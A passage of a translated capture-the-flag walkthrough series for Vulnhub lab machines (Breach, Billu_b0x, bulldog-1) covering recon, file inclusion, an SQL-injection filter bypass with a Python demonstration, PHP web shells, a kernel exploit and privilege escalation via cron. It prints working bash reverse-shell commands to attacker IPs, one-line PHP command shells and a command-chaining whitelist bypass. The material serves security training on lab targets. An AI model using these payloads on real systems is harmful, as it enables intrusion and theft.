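# Constructed samples shaped like the box on this page (the exact sudoers and crontab text is not reproduced there).
SUDO_L_OUTPUT = """Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee, /usr/share/cleanup/tidyup.sh
"""

CRONTAB = """# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/3 *   * * *   root    /usr/share/cleanup/tidyup.sh
"""

if __name__ == '__main__':
    for writer, script in root_write_chains(SUDO_L_OUTPUT, CRONTAB):
        print('sudo %s can overwrite %s, which cron runs as root' % (writer, script))
```

<p>On a live host, feed it the real output of sudo -l and the contents of /etc/crontab and /etc/cron.d/*; a reported pair is exactly the situation exploited with tee here, and the same check is worth running when auditing your own sudoers rules.</p><p><img 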
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Listen with nc and wait for the shell to come back; it runs as root. The flag is an image, so copy it to the home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) A look at the crontab confirms it: tidyup.sh really is scheduled every 3 minutes:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Use the JspSpy shell uploaded earlier to download flair.jpg to Windows:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) View the flag: <code>I NEED TO TALK ABOUT YOUR FLAIR</code>. Game over.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>Summary of the approach</h2><h3><a name='header-n7404' class='md-header-anchor '></a>Key breakthroughs</h3><p>(1) The CMS and Tomcat credentials were decoded from page source and from strings hidden inside images.</p><p>(2) Loading the SSL private key into Wireshark decrypted the SSL-encrypted traffic and exposed the Tomcat manager URL and credentials.</p><p>(3) Getting a shell through the Tomcat manager is a technique worth practising until it is routine.</p><p>(4) Privilege escalation: find the passwords of two accounts, discover that tee and the tidyup.sh cleanup script can be run as root, and get a root reverse shell through the scheduled task.</p><h3><a name='header-n7413' class='md-header-anchor '></a>Difficulties and pitfalls</h3><p>(1) Exporting the SSL key with keytool is not routine pentest knowledge; reading up on the principle and the tool took a lot of time.</p><p>(2) After the Tomcat manager gave a shell, the uploaded China Chopper shell kept getting killed within a few minutes. At the time it looked like antivirus or a web-shell cleaner; it was actually the host's tidyup.sh script running every 3 minutes. A reverse shell gives persistent access.</p><p>(3) Running MySQL commands produced no output. China Chopper timed out on the command, and in nc the result only appeared on exit; I was about to give up when I typed exit and the output finally showed up, revealing milton's password hash. Where the road seemed to end, a new path opened.</p><p>(4) Much time went into the two account switches before the root reverse shell; finding and exploiting tidyup.sh is time-consuming.</p><p>(5) Getting a root reverse shell through a crontab entry is common in real engagements, for example against a Redis instance running as root with no password (the way cryptominers get in), where you can either plant an SSH key or write a root crontab to call a shell back. It was my first time meeting it on Vulnhub, and it is hard for beginners.</p><h1><a name='header-n7424' class='md-header-anchor '></a>Section 2: Billu_b0x</h1><h2><a name='header-n7425' 
class='md-header-anchor '></a>Target information</h2><h3><a name='header-n7426' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor '></a>Target description</h3><p>A medium-difficulty VM running Ubuntu (32-bit) with the following packages: </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>Goal</h3><p>Boot to root: get into the VM through the web application and obtain root.</p><h3><a name='header-n7445' class='md-header-anchor '></a>Environment</h3><ul><li>Target: open the VM in VMware with the network adapter set to NAT; the target obtains an IP automatically.</li><li>Attack machines: a Windows attack box on the same segment with Nmap, Burp Suite, sqlmap, nc, Python 2.7, DirBuster, AWVS, Nessus and other tools, plus a Kali box; most of the work was done from Windows.</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>Reconnaissance</h2><ul><li>IP discovery</li></ul><p>Start the Billu_b0x VM. Since it is in NAT mode, an Nmap sweep of the VMware Network Adapter VMnet8 NAT /24 finds it (-sP is the legacy spelling of the -sn ping scan):</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Target IP: <code>192.168.64.161</code></p><ul><li>Port and service identification</li></ul><p>Scan all ports 1-65535 with nmap, with service detection and the aggressive -A options, saving the result to a text file:</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services on the target:</p><p>Port         Protocol        Service</p><p>TCP 22      SSH        OpenSSH 5.9p1</p><p>TCP 80      HTTP       Apache httpd 2.2.22     <br/></p><p>The web front page has username and password fields and the hint "Show me your SQLI skills".</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>Vulnerability hunting</h2><ul><li>Approach:</li></ul><p>(1) SQL injection: the front page hints at it; find a way to make it work.</p><p>(2) Directory brute force with DirBuster to find new pages and new bugs;</p><p>(3) 
Vulnerability scanning: feed the newly found pages to AWVS or AppScan;</p><p>(4) Manual testing: browse the new pages through Firefox with Burp as proxy and inspect the requests and responses for bugs;</p><p>(5) Read the source of every page for hints;</p><p>(6) If a username and password turn up, try SSH; a working SSH login makes a reverse shell unnecessary.</p><ul><li>Step 1: test the front page for SQL injection</li></ul><p>(1) Entering <code>admin' or 'a'='a --</code> as the username with an arbitrary password does not work; a JavaScript alert says Try again:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Test the POST request with sqlmap:</p><p>sqlmap.py -u "<a href='http://192.168.64.161' target='_blank' class='url'>http://192.168.64.161</a>" --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap finishes without finding an injection. The filter the application applies is unknown at this point, and a few sqlmap tamper scripts did not help either, so park the injection fuzzing and brute force directories instead.</p><ul><li>Step 2: run DirBuster on Windows and dirb on Kali Linux in parallel, for more results in less time:</li></ul><p>Quite a few pages turn up: test.php, add.php, in.php, c.php, index.php, show.php, and the directories uploaded_images and phpmy. Visit them in turn:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 3: use the file inclusion bug to read the PHP source and the passwd file</li></ul><p>(1) test.php says the file parameter is empty and must be supplied</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Test for file inclusion with <code>http://192.168.64.161/test.php?file=/etc/passwd</code>: the file is not included and the browser is sent back to the front page.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Turn the GET into a POST in Firefox's HackBar or in Burp Suite; the inclusion then works and returns the passwd file.</p><p>Posting the data with HackBar downloads the passwd file:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>In Burp Suite, use Change request method to convert the GET into a POST; the passwd file comes back:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Use the same inclusion to download add.php, in.php, c.php, index.php, show.php, panel.php and so on, so the source can be audited while the pages are visited.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) passwd shows one account with UID 1000, ica; so the SSH username could be ica or root:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 4: visit add.php and in.php and audit the code</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php is an upload form, but it does nothing: the source shows it is just a page with no server-side handler. in.php is phpinfo output.</p><ul><li>Step 5: read c.php</li></ul><p>This is the database connection file and it holds the MySQL credentials:</p><p>Username: billu</p><p>Password: b0x_billu</p><p>Database: ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 6: logging in to phpMyAdmin with the MySQL password fails</li></ul><p>(1) dirb found the /phpmy directory, which leads to the phpMyAdmin login page:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /> 
</p><p>Logging in to phpMyAdmin with the MySQL password fails. So far there is one SSH username, ica, and the MySQL account billu with password b0x_billu, but neither SSH nor phpMyAdmin accepts them.</p><p>The SQL injection has not been bypassed yet, and the recovered MySQL password does not get into phpMyAdmin.</p><p>Initial suspicion: a VM fault, with MySQL not running; the plan is to boot Ubuntu into single-user mode later to check.</p><ul><li>Step 7: keep brute forcing the phpmy directory and include the phpMyAdmin configuration file</li></ul><p>(1) phpMyAdmin's default configuration file is config.inc.php. Its path has to be guessed; judging from the URL, the default location is under /var/www/phpmy.</p><p>(2) Read config.inc.php through the file inclusion in Firefox's HackBar or in Burp Suite. With HackBar:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The configuration file contains a root password, roottoor (configured for MySQL, and reused for the system root account, as the next step shows)</p><p>(3) With Burp Suite:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 8: log in as root over SSH with Xshell; the exercise is complete</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 9: investigating the MySQL fault</li></ul><p>root has been obtained, but the earlier phpMyAdmin failure pointed at a MySQL problem. Logged in as root, the MySQL status reads mysql stop/waiting. The likely cause is the earlier high-thread directory brute force and scanning; restarting MySQL failed, so the VM was reinstalled.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the reinstall, SSH in and confirm MySQL is running normally; note that the new VM's IP is 192.168.64.162.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 10: back to step 6, log in to phpMyAdmin with the MySQL password</li></ul><p>Username: billu, password: b0x_billu; the login succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The auth table in the <code>ica_lab</code> database holds the web login: username biLLu, password hEx_it.</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7650' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 11: log in to the front page, get command execution and a reverse shell</li></ul><p>(1) Log in to the front page with the web credentials; the case must match exactly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After login there is an account management page. The accounts are the two captains from Pirates of the Caribbean, Jack Sparrow and Captain Barbossa. As an aside, I prefer Barbossa: a pirate friend who behaves like an enemy, funny, brave, devious, domineering and calculating.</p><p>The two avatar images are in the directory found earlier by brute force: <code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Click add user to reach the account creation page, which has an image upload. The idea is to combine the image upload with a file inclusion to get a shell.</p><p>The panel.php source obtained earlier through test.php shows that panel.php has a local file inclusion vulnerability:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download one of the images from <code>http://192.168.64.162/uploaded_images/</code> (jack), open it in a text editor, insert a one-line command shell <code><?php system($_GET['cmd']); ?></code> in the middle or at the end, and upload it (as cmd.jpg) through the add user form; the upload succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Execute commands with Burp:
Add the command parameter to the URL of the POST request: <code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>The POST body names the cmd.jpg image shell to include: <code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>The command <code>cat /etc/passwd;ls</code> executes successfully</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Spawn a reverse shell with bash</p><p>Command: echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</p><p>The command must be URL-encoded:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Send the command in the POST URL:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 12: find a writable directory and drop a China Chopper shell</li></ul><p>The upload directory uploaded_images is writable; go there and write a China Chopper shell: <code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code> (bash drops the inner single quotes, so the file actually contains <code>$_POST[123456]</code>; PHP normalises numeric string keys to integers, so it still matches the POST parameter 123456)</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>China Chopper connects, which makes file transfer convenient.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>Privilege escalation</h2><ul><li>Step 13: check the kernel and OS version and look for a privilege escalation exploit</li></ul><p>(1) Check the kernel version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Download the well-known Ubuntu local privilege escalation exploit:</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' 
/></p><ul><li>Step 14: compile and escalate</li></ul><p>(1) Set permissions on the source (the chmod 777 is not actually needed: a .c file does not have to be executable, and gcc marks its output executable) </p><p><code>chmod 777 37292.c</code></p><p>(2) Compile the exploit</p><p><code>gcc 37292.c -o exp</code></p><p>(3) Run the exploit and become root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>Summary of the approach</h2><h3><a name='header-n7746' class='md-header-anchor '></a>Other routes</h3><p>There are three regular routes to break in.</p><p>Route 1: craft the injection. Obtain the index.php source through the test.php inclusion, read how it filters SQL, build an injection that gets past the filter, log in, get a shell and escalate.</p><p>(1) Auditing index.php shows the following filter:</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>In PHP, <code>'\''</code> is a single-quote character, so str_replace removes every single quote from the URL-decoded input (encoding the quote as %27 does not help, since urldecode runs first). The values are then placed between single quotes in the query. What the filter leaves alone is the backslash: a trailing <code>\</code> in the password escapes the query's own closing quote, so the password string literal swallows <code> and uname=</code> up to the next quote, and the copy of the payload in the username field then supplies <code>or 1=1</code> outside any string, followed by <code>-- </code> to comment out the rest.</p><p>(2) The usual login payload is ' or 1=1 -- ; append \' to it. str_replace strips the quotes and leaves the backslash in place.</p><p>Tested with an online PHP sandbox:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) The injection succeeds with the payload ' or 1=1 -- \' supplied in both the username and the password field</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>From there, getting a shell is the same as in the walkthrough above.</p><p>Route 2: brute force the phpMyAdmin directory, read the MySQL password from c.php through the file inclusion, log in to phpMyAdmin and get a shell.</p><p>Route 3: include every configuration file the web server can read, take the root password from the phpMyAdmin configuration and log in over SSH. This route works even with MySQL down.</p><ul><li>Pitfalls</li></ul><p>(1) MySQL was knocked over by the high-thread directory brute force and injection attempts: phpMyAdmin refused the correct password and a lot of time was lost. An accidental fault: two tools brute forcing directories and sqlmap injecting at the same time, with too many threads, killed MySQL.</p><p>(2) For the test.php file inclusion, when GET fails try POST. Once the inclusion works, pull down the source of every page and audit it.</p><p>(3) The index.php SQL injection took a lot of time; it turned out the injection was not even needed, as logging in through phpMyAdmin bypassed it.</p><p>(4) The panel.php file inclusion is easy to miss without careful source review. The test.php inclusion could not be made to trigger the shell.</p><p>(5) File upload plus file inclusion is a common way to get a shell on these VMs; with both bugs present, getting a shell is straightforward.</p><p>
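</p><p>To see why the payload has to be shaped this way, the following Python (an added example, not code from the box; the query string is reconstructed from the two str_replace lines above, and the table name auth with the column names pass and uname are assumptions) reproduces the filter and runs the assembled query through a small MySQL-style lexer that honours backslash escapes, doubled quotes and -- comments. A payload counts as a bypass only when or 1=1 lands in executable SQL and no string literal is left unterminated, which is why the same payload in a single field fails and why the plain ' or 1=1 -- (which the filter reduces to a harmless string) fails too.</p>

```python
import urllib.parse


def php_filter(value):
    """The index.php filter: urldecode, then strip every single quote ('\\'' is PHP for the quote char)."""
    return urllib.parse.unquote_plus(value).replace("'", "")


def build_query(un, ps):
    """Assemble the login query the way the application does (values wrapped in single quotes)."""
    return "select * from auth where pass='" + php_filter(ps) + "' and uname='" + php_filter(un) + "'"


def tokenize(sql):
    """Split SQL into ('code' | 'string' | 'unterminated' | 'comment', text) segments the way a MySQL
    lexer would: backslash escapes the next character inside a string, '' is a literal quote, and
    '-- ' or '#' outside a string starts a comment that runs to the end."""
    segments = []
    code = ''
    i = 0
    while i < len(sql):
        ch = sql[i]
        if ch == "'":
            if code:
                segments.append(('code', code))
                code = ''
            j, text, closed = i + 1, '', False
            while j < len(sql):
                if sql[j] == '\\' and j + 1 < len(sql):
                    text += sql[j + 1]
                    j += 2
                elif sql[j] == "'" and j + 1 < len(sql) and sql[j + 1] == "'":
                    text += "'"
                    j += 2
                elif sql[j] == "'":
                    closed = True
                    j += 1
                    break
                else:
                    text += sql[j]
                    j += 1
            segments.append(('string' if closed else 'unterminated', text))
            i = j
        elif sql.startswith('-- ', i) or ch == '#':
            if code:
                segments.append(('code', code))
            segments.append(('comment', sql[i:]))
            return segments
        else:
            code += ch
            i += 1
    if code:
        segments.append(('code', code))
    return segments


def login_bypassed(un, ps):
    """True when the tautology ends up in executable SQL and no string is left unterminated (a syntax error)."""
    segments = tokenize(build_query(un, ps))
    if any(kind == 'unterminated' for kind, _ in segments):
        return False
    executable = ' '.join(text for kind, text in segments if kind == 'code')
    return 'or 1=1' in executable.lower()


if __name__ == '__main__':
    payload = "' or 1=1 -- \\'"
    for un, ps in [(payload, payload), (payload, 'admin'), ("' or 1=1 -- ", "' or 1=1 -- "), ('admin', 'admin')]:
        print('%-72r %s' % (build_query(un, ps), 'BYPASS' if login_bypassed(un, ps) else 'blocked'))
```

<p>The lexer is deliberately minimal (it knows nothing about identifiers or keywords), but it is enough to show which characters survive the filter and where the quote boundaries end up, which is what decides whether a login bypass works. The same filter-then-lex approach is a quick way to reason about any quote-stripping filter before reaching for sqlmap tamper scripts.</p><p>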
(6) For privilege escalation, pay attention to the main configuration files, database connection files and user files; known Ubuntu kernel vulnerabilities can also be used for local privilege escalation.</p><h1><a name='header-n7794' class='md-header-anchor '></a>Section 3: bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>Target information</h2><pre class="md-fences md-end-block" lang="">Author: 红日安全
First published on 安全客: https://www.anquanke.com/post/id/106459</pre><h3><a name='header-n7797' class='md-header-anchor '></a>Download link</h3><p><a 
href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>Target description</h3><p>Bulldog Industries recently had its website defaced by the malicious German Shepherd hackers. Does that mean there are more vulnerabilities to exploit? Why don't you find out? :)</p><p>This is a standard Boot-to-Root; the goal is to get into the root directory and see the congratulatory message.</p><h3><a name='header-n7805' class='md-header-anchor '></a>Goal</h3><p>Obtain root and the flag.</p><h3><a name='header-n7808' class='md-header-anchor '></a>Environment</h3><ul><li>Target: import the image into VirtualBox with the network adapter bridged to the wireless card. On boot the target obtains the IP 172.20.10.7.</li><li>Windows attack machine: the physical host on the wireless network, IP 172.20.10.5, with Burp Suite, nc, Python 2.7, DirBuster and other tools.</li><li>Kali attack machine: a VMware VM bridged to the wireless card, IP 172.20.10.6. Either attack machine will do.</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>Reconnaissance</h2><ul><li>IP discovery</li></ul><p>The target obtains an IP automatically and prints it on the console once booted: 172.20.10.7. No Nmap sweep of the /24 is needed.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port and service identification</li></ul><p>Scan all ports 1-65535 with nmap, with service fingerprinting, saving the result to a text file:</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>Open ports and services on the target:</p><p>Port         Protocol        Service</p><p>TCP 23      SSH        OpenSSH 7.2p2 (SSH on a non-standard port)</p><p>TCP 80      HTTP       WSGIServer Python 2.7.12     <br/></p><p>TCP 8080    HTTP       WSGIServer Python 2.7.12</p><p>OS: Linux 3.2-4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>Vulnerability hunting</h2><ul><li>Web approach:</li></ul><p>(1) Read the source of every page for hints;</p><p>(2) Brute force directories with DirBuster to find new pages and their bugs;</p><p>(3) Look for injection or framework bugs: if a page has input fields or URL parameters, scan for injection with AWVS; if the site is built on a CMS or framework, look for known vulnerabilities in that framework, since scanners rarely find injection there.</p><ul><li>SSH approach:</li></ul><p>(1) With a username in hand, weak passwords can be brute forced with Hydra or Medusa, but that needs a strong wordlist and an actually weak password.</p><p>(2) With web admin or system credentials, try SSH; a working login makes a reverse shell unnecessary.</p><ul><li>Step 1: browse the site and brute force directories</li></ul><p>(1) Visit <code>http://172.20.10.7/</code>, the front page:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>The front page links to a notice page; nothing of value there.</p><p>(2) DirBuster finds the dev and admin directories:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) <code>http://172.20.10.7/admin</code> is a Django admin login requiring a username and password. A few common weak passwords failed; rather than brute forcing right away, look at the other pages first.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) <code>http://172.20.10.7/dev</code> is full of useful information, the main points being:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>The new system no longer uses PHP or any CMS; it is built on the Django framework. That makes web injection unlikely, leaving Django framework bugs to look for; with no PHP there is no point hunting PHP bugs or planting PHP shells.</p><p>The new system is managed through a web shell: there is a Web-shell link to <code>http://172.20.10.7/dev/shell/</code>, which requires authentication.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 2: crack the hashes</li></ul><p>(1) The source of <code>http://172.20.10.7/dev</code> contains the e-mail address and hash of every Team Lead:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>There is also an explicit comment: We'll remove these in prod. 
It's not like a hacker can do anything with a hash.</p><p>(2) The hashes are 40 hex characters, which points to SHA-1. Even without knowing the algorithm, each hash can be submitted to CMD5 for a lookup:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/9.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Two of the hashes resolve:</p><p>Back End: <a href='mailto:nick@bulldogindustries.com' target='_blank' class='url'>nick@bulldogindustries.com</a></p><p>Username: nick, password: bulldog (CMD5 resolves it for free)</p><p>Database: <a href='mailto:sarah@bulldogindustries.com' target='_blank' class='url'>sarah@bulldogindustries.com</a></p><p>Username: sarah, password: bulldoglover (CMD5 charges for this one)</p><ul><li>Step 3: log in to the admin site</li></ul><p>(1) The recovered passwords do not work against the SSH service on port 23:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/10.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) sarah / bulldoglover logs in to the admin site, but the account has no edit rights.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/11.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) Revisit the web shell page: the session is now authenticated and commands can be run. It is a command execution console:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/12.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7938' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 4: bypass the whitelist and run arbitrary commands: </li></ul><p>The web shell only runs whitelisted commands. Try chaining several commands with ; or &&:</p><p>ls is whitelisted and id is blocked; <code>ls && id</code> runs id successfully, so the whitelist only checks the first command and the rest of the line reaches a shell unchecked.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/13.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 5: reverse shell: </li></ul><p>(1) Start an nc listener on the Windows attack box: <code>nc -lvnp 4444</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/14.png' alt='' referrerPolicy='no-referrer' /></p><p>(2) Sending <code>ls && bash -i >& /dev/tcp/172.20.10.5/4444 0>&1</code> directly fails; the server returns a 500 error.</p><p><img 
